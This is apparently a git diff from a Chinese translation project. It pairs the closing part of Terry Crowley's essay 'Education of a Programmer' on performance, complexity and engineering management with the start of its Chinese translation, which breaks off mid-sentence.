tool in your toolbox. - -Performance - -I am sure Don Knuth is horrified by how misunderstood his partial quote “Premature optimization is the root of all evil” has been. In fact, performance, and the incredible exponential improvements in performance that have continued for over 6 decades (or more than 10 decades depending on how willing you are to project these trends through discrete transistors, vacuum tubes and electromechanical relays), underlie all of the amazing innovation we have seen in our industry and all the change rippling through the economy as “software eats the world”. - -A key thing to recognize about this exponential change is that while all components of the system are experiencing exponential change, these exponentials are divergent. So the rate of increase in capacity of a hard disk changes at a different rate from the capacity of memory or the speed of the CPU or the latency between memory and CPU. Even when trends are driven by the same underlying technology, exponentials diverge. [Latency improvements fundamentally trail bandwidth improvements][7]. Exponential change tends to look linear when you are close to it or over short periods but the effects over time can be overwhelming. This overwhelming change in the relationship between the performance of components of the system forces reevaluation of design decisions on a regular basis. - -A consequence of this is that design decisions that made sense at one point no longer make sense after a few years. Or in some cases an approach that made sense two decades ago starts to look like a good trade-off again. Modern memory mapping has characteristics that look more like process swapping of the early time-sharing days than it does like demand paging. (This does sometimes result in old codgers like myself claiming that “that’s just the same approach we used back in ‘75” — ignoring the fact that it didn’t make sense for 40 years and now does again because some balance between two components — maybe flash and NAND rather than disk and core memory — has come to resemble a previous relationship). - -Important transitions happen when these exponentials cross human constraints. So you move from a limit of two to the sixteenth characters (which a single user can type in a few hours) to two to the thirty-second (which is beyond what a single person can type). So you can capture a digital image with higher resolution than the human eye can perceive. Or you can store an entire music collection on a hard disk small enough to fit in your pocket. Or you can store a digitized video recording on a hard disk. And then later the ability to stream that recording in real time makes it possible to “record” it by storing it once centrally rather than repeatedly on thousands of local hard disks. - -The things that stay as a fundamental constraint are three dimensions and the speed of light. We’re back to that Einsteinian universe. We will always have memory hierarchies — they are fundamental to the laws of physics. You will always have stable storage and IO, memory, computation and communications. The relative capacity, latency and bandwidth of these elements will change, but the system is always about how these elements fit together and the balance and tradeoffs between them. Jim Gray was the master of this analysis. - -Another consequence of the fundamentals of 3D and the speed of light is that much of performance analysis is about three things: locality, locality, locality. Whether it is packing data on disk, managing processor cache hierarchies, or coalescing data into a communications packet, how data is packed together, the patterns for how you touch that data with locality over time and the patterns of how you transfer that data between components is fundamental to performance. Focusing on less code operating on less data with more locality over space and time is a good way to cut through the noise. - -Jon Devaan used to say “design the data, not the code”. This also generally means when looking at the structure of a system, I’m less interested in seeing how the code interacts — I want to see how the data interacts and flows. If someone tries to explain a system by describing the code structure and does not understand the rate and volume of data flow, they do not understand the system. - -A memory hierarchy also implies we will always have caches — even if some system layer is trying to hide it. Caches are fundamental but also dangerous. Caches are trying to leverage the runtime behavior of the code to change the pattern of interaction between different components in the system. They inherently need to model that behavior, even if that model is implicit in how they fill and invalidate the cache and test for a cache hit. If the model is poor  _or becomes_  poor as the behavior changes, the cache will not operate as expected. A simple guideline is that caches  _must_  be instrumented — their behavior will degrade over time because of changing behavior of the application and the changing nature and balance of the performance characteristics of the components you are modeling. Every long-time programmer has cache horror stories. - -I was lucky that my early career was spent at BBN, one of the birthplaces of the Internet. It was very natural to think about communications between asynchronous components as the natural way systems connect. Flow control and queueing theory are fundamental to communications systems and more generally the way that any asynchronous system operates. Flow control is inherently resource management (managing the capacity of a channel) but resource management is the more fundamental concern. Flow control also is inherently an end-to-end responsibility, so thinking about asynchronous systems in an end-to-end way comes very naturally. The story of [buffer bloat][8]is well worth understanding in this context because it demonstrates how lack of understanding the dynamics of end-to-end behavior coupled with technology “improvements” (larger buffers in routers) resulted in very long-running problems in the overall network infrastructure. - -The concept of “light speed” is one that I’ve found useful in analyzing any system. A light speed analysis doesn’t start with the current performance, it asks “what is the best theoretical performance I could achieve with this design?” What is the real information content being transferred and at what rate of change? What is the underlying latency and bandwidth between components? A light speed analysis forces a designer to have a deeper appreciation for whether their approach could ever achieve the performance goals or whether they need to rethink their basic approach. It also forces a deeper understanding of where performance is being consumed and whether this is inherent or potentially due to some misbehavior. From a constructive point of view, it forces a system designer to understand what are the true performance characteristics of their building blocks rather than focusing on the other functional characteristics. - -I spent much of my career building graphical applications. A user sitting at one end of the system defines a key constant and constraint in any such system. The human visual and nervous system is not experiencing exponential change. The system is inherently constrained, which means a system designer can leverage ( _must_  leverage) those constraints, e.g. by virtualization (limiting how much of the underlying data model needs to be mapped into view data structures) or by limiting the rate of screen update to the perception limits of the human visual system. - -The Nature of Complexity - -I have struggled with complexity my entire career. Why do systems and apps get complex? Why doesn’t development within an application domain get easier over time as the infrastructure gets more powerful rather than getting harder and more constrained? In fact, one of our key approaches for managing complexity is to “walk away” and start fresh. Often new tools or languages force us to start from scratch which means that developers end up conflating the benefits of the tool with the benefits of the clean start. The clean start is what is fundamental. This is not to say that some new tool, platform or language might not be a great thing, but I can guarantee it will not solve the problem of complexity growth. The simplest way of controlling complexity growth is to build a smaller system with fewer developers. - -Of course, in many cases “walking away” is not an alternative — the Office business is built on hugely valuable and complex assets. With OneNote, Office “walked away” from the complexity of Word in order to innovate along a different dimension. Sway is another example where Office decided that we needed to free ourselves from constraints in order to really leverage key environmental changes and the opportunity to take fundamentally different design approaches. With the Word, Excel and PowerPoint web apps, we decided that the linkage with our immensely valuable data formats was too fundamental to walk away from and that has served as a significant and ongoing constraint on development. - -I was influenced by Fred Brook’s “[No Silver Bullet][9]” essay about accident and essence in software development. There is much irreducible complexity embedded in the essence of what the software is trying to model. I just recently re-read that essay and found it surprising on re-reading that two of the trends he imbued with the most power to impact future developer productivity were increasing emphasis on “buy” in the “build vs. buy” decision — foreshadowing the change that open-source and cloud infrastructure has had. The other trend was the move to more “organic” or “biological” incremental approaches over more purely constructivist approaches. A modern reader sees that as the shift to agile and continuous development processes. This in 1986! - -I have been much taken with the work of Stuart Kauffman on the fundamental nature of complexity. Kauffman builds up from a simple model of Boolean networks (“[NK models][10]”) and then explores the application of this fundamentally mathematical construct to things like systems of interacting molecules, genetic networks, ecosystems, economic systems and (in a limited way) computer systems to understand the mathematical underpinning to emergent ordered behavior and its relationship to chaotic behavior. In a highly connected system, you inherently have a system of conflicting constraints that makes it (mathematically) hard to evolve that system forward (viewed as an optimization problem over a rugged landscape). A fundamental way of controlling this complexity is to batch the system into independent elements and limit the interconnections between elements (essentially reducing both “N” and “K” in the NK model). Of course this feels natural to a system designer applying techniques of complexity hiding, information hiding and data abstraction and using loose asynchronous coupling to limit interactions between components. - -A challenge we always face is that many of the ways we want to evolve our systems cut across all dimensions. Real-time co-authoring has been a very concrete (and complex) recent example for the Office apps. - -Complexity in our data models often equates with “power”. An inherent challenge in designing user experiences is that we need to map a limited set of gestures into a transition in the underlying data model state space. Increasing the dimensions of the state space inevitably creates ambiguity in the user gesture. This is “[just math][11]” which means that often times the most fundamental way to ensure that a system stays “easy to use” is to constrain the underlying data model. - -Management - -I started taking leadership roles in high school (student council president!) and always found it natural to take on larger responsibilities. At the same time, I was always proud that I continued to be a full-time programmer through every management stage. VP of development for Office finally pushed me over the edge and away from day-to-day programming. I’ve enjoyed returning to programming as I stepped away from that job over the last year — it is an incredibly creative and fulfilling activity (and maybe a little frustrating at times as you chase down that “last” bug). - -Despite having been a “manager” for over a decade by the time I arrived at Microsoft, I really learned about management after my arrival in 1996\. Microsoft reinforced that “engineering leadership is technical leadership”. This aligned with my perspective and helped me both accept and grow into larger management responsibilities. - -The thing that most resonated with me on my arrival was the fundamental culture of transparency in Office. The manager’s job was to design and use transparent processes to drive the project. Transparency is not simple, automatic, or a matter of good intentions — it needs to be designed into the system. The best transparency comes by being able to track progress as the granular output of individual engineers in their day-to-day activity (work items completed, bugs opened and fixed, scenarios complete). Beware subjective red/green/yellow, thumbs-up/thumbs-down dashboards! - -I used to say my job was to design feedback loops. Transparent processes provide a way for every participant in the process — from individual engineer to manager to exec to use the data being tracked to drive the process and result and understand the role they are playing in the overall project goals. Ultimately transparency ends up being a great tool for empowerment — the manager can invest more and more local control in those closest to the problem because of confidence they have visibility to the progress being made. Coordination emerges naturally. - -Key to this is that the goal has actually been properly framed (including key resource constraints like ship schedule). Decision-making that needs to constantly flow up and down the management chain usually reflects poor framing of goals and constraints by management. - -I was at Beyond Software when I really internalized the importance of having a singular leader over a project. The engineering manager departed (later to hire me away for FrontPage) and all four of the leads were hesitant to step into the role — not least because we did not know how long we were going to stick around. We were all very technically sharp and got along well so we decided to work as peers to lead the project. It was a mess. The one obvious problem is that we had no strategy for allocating resources between the pre-existing groups — one of the top responsibilities of management! The deep accountability one feels when you know you are personally in charge was missing. We had no leader really accountable for unifying goals and defining constraints. - -I have a visceral memory of the first time I fully appreciated the importance of  _listening_  for a leader. I had just taken on the role of Group Development Manager for Word, OneNote, Publisher and Text Services. There was a significant controversy about how we were organizing the text services team and I went around to each of the key participants, heard what they had to say and then integrated and wrote up all I had heard. When I showed the write-up to one of the key participants, his reaction was “wow, you really heard what I had to say”! All of the largest issues I drove as a manager (e.g. cross-platform and the shift to continuous engineering) involved carefully listening to all the players. Listening is an active process that involves trying to understand the perspectives and then writing up what I learned and testing it to validate my understanding. When a key hard decision needed to happen, by the time the call was made everyone knew they had been heard and understood (whether they agreed with the decision or not). - -It was the previous job, as FrontPage development manager, where I internalized the “operational dilemma” inherent in decision making with partial information. The longer you wait, the more information you will have to make a decision. But the longer you wait, the less flexibility you will have to actually implement it. At some point you just need to make a call. - -Designing an organization involves a similar tension. You want to increase the resource domain so that a consistent prioritization framework can be applied across a larger set of resources. But the larger the resource domain, the harder it is to actually have all the information you need to make good decisions. An organizational design is about balancing these two factors. Software complicates this because characteristics of the software can cut across the design in an arbitrary dimensionality. Office has used [shared teams][12] to address both these issues (prioritization and resources) by having cross-cutting teams that can share work (add resources) with the teams they are building for. - -One dirty little secret you learn as you move up the management ladder is that you and your new peers aren’t suddenly smarter because you now have more responsibility. This reinforces that the organization as a whole better be smarter than the leader at the top. Empowering every level to own their decisions within a consistent framing is the key approach to making this true. Listening and making yourself accountable to the organization for articulating and explaining the reasoning behind your decisions is another key strategy. Surprisingly, fear of making a dumb decision can be a useful motivator for ensuring you articulate your reasoning clearly and make sure you listen to all inputs. - -Conclusion - -At the end of my interview round for my first job out of college, the recruiter asked if I was more interested in working on “systems” or “apps”. I didn’t really understand the question. Hard, interesting problems arise at every level of the software stack and I’ve had fun plumbing all of them. Keep learning. - --------------------------------------------------------------------------------- - -via: https://hackernoon.com/education-of-a-programmer-aaecf2d35312 - -作者:[ Terry Crowley][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://hackernoon.com/@terrycrowley -[1]:https://medium.com/@terrycrowley/leaky-by-design-7b423142ece0#.x67udeg0a -[2]:https://medium.com/@terrycrowley/how-to-think-about-cancellation-3516fc342ae#.3pfjc5b54 -[3]:http://queue.acm.org/detail.cfm?id=2462076 -[4]:http://web.mit.edu/Saltzer/www/publications/endtoend/endtoend.pdf -[5]:https://medium.com/@terrycrowley/model-view-controller-and-loose-coupling-6370f76e9cde#.o4gnupqzq -[6]:https://en.wikipedia.org/wiki/Termcap -[7]:http://www.ll.mit.edu/HPEC/agendas/proc04/invited/patterson_keynote.pdf -[8]:https://en.wikipedia.org/wiki/Bufferbloat -[9]:http://worrydream.com/refs/Brooks-NoSilverBullet.pdf -[10]:https://en.wikipedia.org/wiki/NK_model -[11]:https://medium.com/@terrycrowley/the-math-of-easy-to-use-14645f819201#.untmk9eq7 -[12]:https://medium.com/@terrycrowley/breaking-conways-law-a0fdf8500413#.gqaqf1c5k diff --git a/translated/talk/20170320 Education of a Programmer.md b/translated/talk/20170320 Education of a Programmer.md new file mode 100644 index 0000000000..84762b8655 --- /dev/null +++ b/translated/talk/20170320 Education of a Programmer.md @@ -0,0 +1,167 @@ +程序员的学习之路 +============================================================ + +*2016 年 10 月,当我从微软离职时,我已经在微软工作了近 21 年,在工业界也快 35 年了。我花了一些时间反思我这些年来学到的东西,这些文字是那篇帖子稍加修改后得到。请见谅,文章有一点长。* + +要成为一名专业的程序员,你需要知道的事情多得令人吃惊:语言的细节,API,算法,数据结构,系统和工具。这些东西一直在随着时间变化——新的语言和编程环境不断出现,似乎总有热门的新工具或新语言是“每个人”都在使用的。紧跟潮流,保持专业,这很重要。木匠需要知道如何为工作选择合适的锤子和钉子,并且要有能力笔直精准地钉入钉子。 + +与此同时,我也发现有一些理论和方法有着广泛的应用场景,它们能使用几十年。底层设备的性能和容量在这几十年来增长了几个数量级,但系统设计的思考方式还是互相有关联的,这些思考方式比具体的实现更根本。理解这些重复出现的主题对分析与设计我们所负责的系统大有帮助。 + +谦卑和自我 + +这不仅仅局限于编程,但在编程这个持续发展的领域,一个人需要在谦卑和自我中保持平衡。总有新的东西需要学习,并且总有人能帮助你学习——如果你愿意学习的话。一个人即需要保持谦卑,认识到自己不懂并承认它,也要保持自我,相信自己能掌握一个新的领域,并且能运用你已经掌握的知识。我见过的最大的挑战就是一些人在某个领域深入专研了很长时间,“忘记”了自己擅长学习新的东西。最好的学习来自放手去做,建造一些东西,即便只是一个原型或者 hack。我知道的最好的程序员对技术有广泛的认识,但同时他们对某个技术深入研究,成为了专家。而深入的学习来自努力解决真正困难的问题。 + +端到端观点 + +1981 年,Jerry Saltzer, Dave Reed 和 Dave Clark 在做因特网和分布式系统的早期工作,他们提出了端到端观点,并作出了[经典的阐述][4]。网络上的文章有许多误传,所以更应该阅读论文本身。论文的作者很谦虚,没有声称这是他们自己的创造——从他们的角度看,这只是一个常见的工程策略,不只在通讯领域中,在其他领域中也有运用。他们只是将其写下来并收集了一些例子。下面是文章的一个小片段: + +> 当我们设计系统的一个功能时,仅依靠端点的知识和端点的参与,就能正确地完整地实现这个功能。在一些情况下,系统的内部模块局部实现这个功能,可能会对性能有重要的提升。 + +论文称这是一个“观点”,虽然在维基百科和其他地方它已经被上升成“原则”。实际上,还是把它看作一个观点比较好,正如作者们所说,系统设计者面临的最难的问题之一就是如何在系统组件之间划分责任,这会引发不断的讨论:怎样在划分功能时权衡利弊,怎样隔离复杂性,怎样设计一个灵活的高性能系统来满足不断变化的需求。没有简单的原则可以直接遵循。 + +互联网上的大部分讨论集中在通信系统上,但端到端观点的适用范围其实更广泛。分布式系统中的“最终一致性”就是一个例子。一个满足“最终一致性”的系统,可以让系统中的元素暂时进入不一致的状态,从而简化系统,优化性能,因为有一个更大的端到端过程来解决不一致的状态。我喜欢横向拓展的订购系统的例子(例如亚马逊),它不要求每个请求都通过中央库存的控制点。缺少中央控制点可能允许两个终端出售相同的最后一本书,所以系统需要用某种方法来解决这个问题,如通知客户该书会延期交货。不论怎样设计,想购买的最后一本书在订单完成前都有可能被仓库中的叉车运出厍(译者注:比如被其他人下单购买)。一旦你意识到你需要一个端到端的解决方案,并实现了这个方案,那系统内部的设计就可以被优化,并利用这个解决方案。 + +事实上,这种设计上的灵活性可以优化系统的性能,或者提供其他的系统功能,从而使得端到端的方法变得如此强大。端到端的思考往往允许内部进行灵活的操作,使整个系统更加健壮,并且能适应每个组件特性的变化。这些都让端到端的方法变得健壮,并能适应变化。 + +端到端方法意味着,添加会牺牲整体性能灵活性的抽象层和功能时要非常小心(也可能是其他的灵活性,但性能,特别是延迟,往往是特殊的)。如果你展示出底层的原始性能(performance, 也可能指操作),端到端的方法可以根据这个性能(操作)来优化,实现特定的需求。如果你破坏了底层性能(操作),即使你实现了重要的有附加价值的功能,你也牺牲了设计灵活性。 + +如果系统足够庞大而且足够复杂,需要把整个开发团队分配给系统内部的组件,那么端到端观点可以和团队组织相结合。这些团队自然要扩展这些组件的功能,他们通常从牺牲设计上的灵活性开始,尝试在组件上实现端到端的功能。 + +应用端到端方法面临的挑战之一是确定端点在哪里。 俗话说,“大跳蚤上有小跳蚤,小跳蚤上有更少的跳蚤……等等”。 + +关注复杂性 + +编程是一门精确的艺术,每一行代码都要确保程序的正确执行。但这是带有误导的。编程的复杂性不在于各个部分的整合,也不在于各个部分之间如何相互交互。最健壮的程序将复杂性隔离开,让最重要的部分变的简单直接,通过简单的方式与其他部分交互。虽然隐藏复杂性和信息隐藏、数据抽象等其他设计方法一样,但我仍然觉得,如果你真的要定位出系统的复杂所在,并将其隔离开,那你需要对设计特别敏锐。 + +在我的[文章][5]中反复提到的例子是早期的终端编辑器 VI 和 Emacs 中使用的屏幕重绘算法。早期的视频终端实现了控制序列,来控制绘制字符核心操作,也实现了附加的显示功能,来优化重新绘制屏幕,如向上向下滚动当前行,或者插入新行,或在当前行中移动字符。这些命令都具有不同的开销,并且这些开销在不同制造商的设备中也是不同的。(参见[TERMCAP][6]以获取代码链接和更完整的历史记录。)像文本编辑器这样的全屏应用程序希望尽快更新屏幕,因此需要优化使用这些控制序列来转换屏幕从一个状态到另一个状态。 + +这些程序在设计上隐藏了底层的复杂性。系统中修改文本缓冲区的部分(功能上大多数创新都在这里)完全忽略了这些改变如何被转换成屏幕更新命令。这是可以接受的,因为针对*任何*内容的改变计算最佳命令所消耗的性能代价,远不及被终端本身实际执行这些更新命令的性能代价。在确定如何隐藏复杂性,以及隐藏哪些复杂性时,性能分析扮演着重要的角色,这一点在系统设计中非常常见。屏幕的更新与底层文本缓冲区的更改是异步的,并且可以独立于缓冲区的实际历史变化顺序。缓冲区*怎样*改变的并不重要,重要的是改变了*什么*。异步耦合,在组件交互时消除组件对历史路径依赖的组合,以及用自然的交互方式以有效地将组件组合在一起是隐藏耦合复杂度的常见特征。 + +隐藏复杂性的成功不是由隐藏复杂性的组件决定的,而是由使用该模块的使用者决定的。这就是为什么组件的提供者至少要为组件的某些端到端过程负责。他们需要清晰的知道系统的其他部分如何与组件相互作用,复杂性是如何泄漏出来的(以及是否泄漏出来)。这常常表现为“这个组件很难使用”这样的反馈——这通常意味着它不能有效地隐藏内部复杂性,或者没有选择一个隐藏复杂性的功能边界。 + +分层与组件化 + +系统设计人员的一个基本工作是确定如何将系统分解成组件和层;决定自己要开发什么,以及从别的地方获取什么。开源项目在决定自己开发组件还是购买服务时,大多会选择自己开发,但组件之间交互的过程是一样的。在大规模工程中,理解这些决策将如何随着时间的推移而发挥作用是非常重要的。从根本上说,变化是程序员所做的一切的基础,所以这些设计决定不仅在当下被评估,还要随着产品的不断发展而在未来几年得到评估。 + +以下是关于系统分解的一些事情,它们最终会占用大量的时间,因此往往需要更长的时间来学习和欣赏。 + +* 层泄漏。层(或抽象)[基本上是泄漏的][1]。这些泄漏会立即产生后果,也会随着时间的推移而产生两方面的后果。其中一方面就是该抽象层的特性渗透到了系统的其他部分,渗透的程度比你意识到得更深入。这些渗透可能是关于具体的性能特征的假设,以及抽象层的文档中没有明确的指出的行为发生的顺序。这意味着假如内部组件的行为发生变化,你的系统会比想象中更加脆弱。第二方面是你比表面上看起来更依赖组件内部的行为,所以如果你考虑改变这个抽象层,后果和挑战可能超出你的想象。 + +* 层具有太多功能了。您所采用的组件具有比实际需要更多的功能,这几乎是一个真理。在某些情况下,你决定采用这个组件是因为你想在将来使用那些尚未用到的功能。有时,你采用组件是想“上快车”,利用组件完成正在进行的工作。在功能强大的抽象层上开发会带来一些后果。1) 组件往往会根据你并不需要的功能作出取舍。 2) 为了实现那些你并不没有用到的功能,组件引入了复杂性和约束,这些约束将阻碍该组件的未来的演变。3) 层泄漏的范围更大。一些泄漏是由于真正的“抽象泄漏”,另一些是由于明显的,逐渐增加的对组件全部功能的依赖(但这些依赖通常都没有处理好)。Office 太大了,我们发现,对于我们建立的任何抽象层,我们最终都在系统的某个部分完全运用了它的功能。虽然这看起来是积极的(我们完全地利用了这个组件),但并不是所用的使用都有同样的价值。所以,我们最终要付出巨大的代价才能从一个抽象层往另一个抽象层迁移,这种“长尾巴”没什么价值,并且对使用场景认识不足。4) 附加的功能会增加复杂性,并增加功能滥用的可能。如果将验证 XML 的 API 指定为 XML 树的一部分,那这个 API 可以选择动态下载 XML 的模式定义。这在我们的基本文件解析代码中被错误地执行,导致 w3c.org 服务器上的大量性能下降以及(无意)分布式拒绝服务攻击。(这些被通俗地称为“地雷”API)。 + +* 抽象层被更换。需求发展,系统发展,组件被放弃。您最终需要更换该抽象层或组件。不管是对外部组件的依赖还是对内部组件的依赖都是如此。这意味着上述问题将变得重要起来。 + +* 自己构建还是购买的决定将会改变。这是上面几方面的必然结果。这并不意味着自己构建还是购买的决定在当时是错误的。一开始时往往没有合适的组件,一段时间之后才有合适的组件出现。或者,也可能你使用了一个组件,但最终发现它不符合您不断变化的要求,而且你的要求非常窄,能被理解,或着对你的价值体系来说是非常重要的,以至于拥有自己的模块是有意义的。这意味着你像关心自己构造的模块一样,关心购买的模块,关心它们是怎样泄漏并深入你的系统中的。 + +* 抽象层会变臃肿。一旦你定义了一个抽象层,它就开始增加功能。层是对使用模式优化的自然分界点。臃肿的层的困难在于,它往往会降低您利用底层的不断创新的能力。从某种意义上说,这就是操作系统公司憎恨构建在其核心功能之上的臃肿的层的原因——采用创新的速度放缓了。避免这种情况的一种比较规矩的方法是禁止在适配器层中进行任何额外的状态存储。微软基础类在 Win32 上采用这个一般方法。在短期内,将功能集成到现有层(最终会导致上述所有问题)而不是重构和重新推导是不可避免的。理解这一点的系统设计人员寻找分解和简化组件的方法,而不是在其中增加越来越多的功能。 + +爱因斯坦宇宙 + +几十年来,我一直在设计异步分布式系统,但是在微软内部的一次演讲中,SQL 架构师 Pat Helland 的一句话震惊了我。 “我们生活在爱因斯坦的宇宙中,没有同时性。”在构建分布式系统时(基本上我们构建的都是分布式系统),你无法隐藏系统的分布式特性。这是物理的。我一直感到远程过程调用在根本上错误的,这是一个原因,尤其是那些“透明的”远程过程调用,它们就是想隐藏分布式的交互本质。你需要拥抱系统的分布式特性,因为这些意义几乎总是需要通过系统设计和用户体验来完成。 + +拥抱分布式系统的本质则要遵循以下几个方面: + +* 一开始就要思考设计对用户体验的影响,而不是试图在处理错误,取消请求和报告状态上打补丁。 + +* 使用异步技术来耦合组件。同步耦合是*不可能*的。如果某些行为看起来是同步的,是因为某些内部层尝试隐藏异步,这样做会遮蔽(但绝对不隐藏)系统运行时的基本行为特征。 + +* 认识到并且明确设计了交互状态机,这些状态表示长期的可靠的内部系统状态(而不是由深度调用堆栈中的变量值编码的临时,短暂和不可发现的状态)。 + +* 认识到失败是在所难免的。要保证能检测出分布式系统中的失败,唯一的办法就是直接看你的等待时间是否“太长”。这自然意味着[取消的等级最高][2]。系统的某一层(可能直接通向用户)需要决定等待时间是否过长,并取消操作。取消只是为了重建局部状态,回收局部的资源——没有办法在系统内广泛使用取消机制。有时用一种低成本,不可靠的方法广泛使用取消机制对优化性能可能有用。 + +* 认识到取消不是回滚,因为它只是回收本地资源和状态。如果回滚是必要的,它必须实现成一个端到端的功能。 + +* 承认永远不会真正知道分布式组件的状态。只要你发现一个状态,它可能就已经改变了。当你发送一个操作时,请求可能在传输过程中丢失,也可能被处理了但是返回的响应丢失了,或者请求需要一定的时间来处理,这样远程状态最终会在未来的某个任意的时间转换。这需要像幂等操作这样的方法,并且要能够稳健有效地重新发现远程状态,而不是期望可靠地跟踪分布式组件的状态。“[最终一致性][3]”的概念简洁地捕捉了这其中大多数想法。 + +我喜欢说你应该“陶醉在异步”。与其试图隐藏异步,不如接受异步,为异步而设计。当你看到像幂等性或不变性这样的技术时,你就认识到它们是拥抱宇宙本质的方法,而不仅仅是工具箱中的一个设计工具。 + +性能 + +我确信 Don Knuth 会对人们怎样误解他的名言“过早的优化是一切罪恶的根源”而感到震惊。事实上,性能,及性能持续超过60年的指数增长(或超过10年,取决于您是否愿意将晶体管,真空管和机电继电器的发展算入其中),为所有行业内的惊人创新和影响经济的“软件吃遍世界”的变化打下了基础。 + +要认识到这种指数变化的一个关键是,虽然系统的所有组件正在经历指数变化,但这些指数是不同的。硬盘容量的增长速度与内存容量的增长速度不同,与 CPU 的增长速度不同,与内存 CPU 之间的延迟的性能改善速度也不用。即使性能发展的趋势是由相同的基础技术驱动的,增长的指数也会有分歧。[延迟的改进从根本上改善了带宽][7]。指数变化在近距离或者短期内看起来是线性的,但随着时间的推移可能是压倒性的。系统不同组件的性能的增长不同,会出现压倒性的变化,并迫使对设计决策定期进行重新评估。 + +这样做的结果是,几年后,一度有意义的设计决定就不再有意义了。或者在某些情况下,二十年前有意义的方法又开始变成一个好的决定。现代内存映射的特点看起来更像是早期分时的进程切换,而不像分页那样。 (这样做有时会让我这样的老人说“这就是我们在 1975 年时用的方法”——忽略了这种方法在 40 年都没有意义,但现在又重新成为好的方法,因为两个组件之间的关系——可能是闪存和 NAND 而不是磁盘和核心内存——已经变得像以前一样了)。 + +当这些指数超越人自身的限制时,重要的转变就发生了。你能从 2 的 16 次方个字符(一个人可以在几个小时打这么多字)过渡到 2 的 3 次方个字符(远超出了一个人打字的范围)。你可以捕捉比人眼能感知的分辨率更高的数字图像。或者你可以将整个音乐专辑存在小巧的磁盘上,放在口袋里。或者你可以将数字化视频录制存储在硬盘上。再通过实时流式传输的能力,可以在一个地方集中存储一次,不需要在数千个本地硬盘上重复记录。 + +但有的东西仍然是根本的限制条件,那就是空间的三维和光速。我们又回到了爱因斯坦的宇宙。内存的分级结构将始终存在——它是物理定律的基础。稳定的存储和 IO,内存,计算和通信也都将一直存在。这些模块的相对容量,延迟和带宽将会改变,但是系统始终要考虑这些元素如何组合在一起,以及它们之间的平衡和折衷。Jim Gary 是这方面的大师。 + +空间和光速的根本限制造成的另一个后果是,性能分析主要是关于三件事:局部化 (locality),局部化,局部化。无论是将数据打包在磁盘上,管理处理器缓存的层次结构,还是将数据合并到通信数据包中,数据如何打包在一起,如何在一段时间内从局部获取数据,数据如何在组件之间传输数据是性能的基础。把重点放在减少管理数据的代码上,增加空间和时间上的局部性,是消除噪声的好办法。 + +Jon Devaan 曾经说过:“设计数据,而不是设计代码”。这也通常意味着当查看系统结构时,我不太关心代码如何交互——我想看看数据如何交互和流动。如果有人试图通过描述代码结构来解释一个系统,而不理解数据流的速率和数量,他们就不了解这个系统。 + +内存的层级结构也意味着我缓存将会一直存在——即使某些系统层正在试图隐藏它。缓存是根本的,但也是危险的。缓存试图利用代码的运行时行为,来改变系统中不同组件之间的交互模式。它们需要对运行时行为进行建模,即使模型填充缓存并使缓存失效,并测试缓存命中。如果模型由于行为改变而变差或变得不佳,缓存将无法按预期运行。一个简单的指导方针是,缓存必须被检测——由于应用程序行为的改变,事物不断变化的性质和组件之间性能的平衡,缓存的行为将随着时间的推移而退化。每一个老程序员都有缓存变糟的经历。 + +我很幸运,我的早期职业生涯是在互联网的发源地之一 BBN 度过的。 我们很自然地将将异步组件之间的通信视为系统连接的自然方式。流量控制和队列理论是通信系统的基础,更是任何异步系统运行的方式。流量控制本质上是资源管理(管理通道的容量),但资源管理是更根本的关注点。流量控制本质上也应该由端到端的应用负责,所以用端到端的方式思考异步系统是自然的。[缓冲区膨胀][8]的故事在这种情况下值得研究,因为它展示了当对端到端行为的动态性以及技术“改进”(路由器中更大的缓冲区)缺乏理解时,在整个网络基础设施中导致的长久的问题。 + + 我发现“光速”的概念在分析任何系统时都非常有用。光速分析并不是从当前的性能开始分析,而是问“这个设计理论上能达到的最佳性能是多少?”真正传递的信息是什么,以什么样的速度变化?组件之间的底层延迟和带宽是多少?光速分析迫使设计师深入思考他们的方法能否达到性能目标,或者否需要重新考虑设计的基本方法。它也迫使人们更深入地了解性能在哪里损耗,以及损耗是由固有的,还是由于一些不当行为产生的。从构建的角度来看,它迫使系统设计人员了解其构建的模块的真实性能特征,而不是关注其他功能特性。 + +我的职业生涯大多花费在构建图形应用程序上。用户坐在系统的一端,定义关键的常量和约束。人类的视觉和神经系统没有经历过指数性的变化。它们固有地受到限制,这意味着系统设计者可以利用(必须利用)这些限制,例如,通过虚拟化(限制底层数据模型需要映射到视图数据结构中的数量),或者通过将屏幕更新的速率限制到人类视觉系统的感知限制。 + +复杂性的本质 + +我的整个职业生涯都在与复杂性做斗争。为什么系统和应用变得复杂呢?为什么在一个应用领域内进行开发并没有随着时间变得简单,而基础设施却没有变得更复杂,反而变得更强大了?事实上,管理复杂性的一个关键方法就是“走开”然后重新开始。通常新的工具或语言迫使我们从头开始,这意味着开发人员将工具的优点与从新开始的优点结合起来。从新开始是重要的。这并不是说新工具,新平台,或新语言可能不好,但我保证它们不能解决复杂性增长的问题。控制复杂性的最简单的方法就是用更少的程序员,建立一个更小的系统。 + +当然,很多情况下“走开”并不是一个选择——Office 建立在有巨大的价值的复杂的资源上。通过 OneNote, Office 从 Word 的复杂性上“走开”,从而在另一个维度上进行创新。Sway 是另一个例子, Office 决定从限制中跳出来,利用关键的环境变化,抓住机会从底层上采取全新的设计方案。我们有 Word,Excel,PowerPoint 这些应用,它们的数据结构非常有价值,我们并不能完全放弃这些数据结构,它们成为了开发中持续的显著的限制条件。 + +我受到 Fred Brook 讨论软件开发中的意外和本质的文章[《没有银子弹》][9]的影响,他希望用两个趋势来尽可能地推动程序员的生产力:一是在选择自己开发还是购买时,更多地关注购买——这预示了开源社区和云架构的改变;二是从单纯的构建方法转型到更“有机”或者“生态”的增量开发方法。现代的读者可以认为是向敏捷开发和持续开发的转型。但那篇文章可是写于 1986 年! + +我很欣赏 Stuart Kauffman 的在复杂性的基本性上的研究工作。Kauffman 从一个简单的布尔网络模型(“[NK 模型][10]”)开始建立起来,然后探索这个基本的数学结构在相互作用的分子,基因网络,生态系统,经济系统,计算机系统(以有限的方式)等系统中的应用,来理解紧急有序行为的数学基础及其与混沌行为的关系。在一个高度连接的系统中,你固有地有一个相互冲突的约束系统,使得它(在数学上)很难向前发展(这被看作是在崎岖景观上的优化问题)。控制这种复杂性的基本方法是将系统分成独立元素并限制元素之间的相互连接(实质上减少 NK 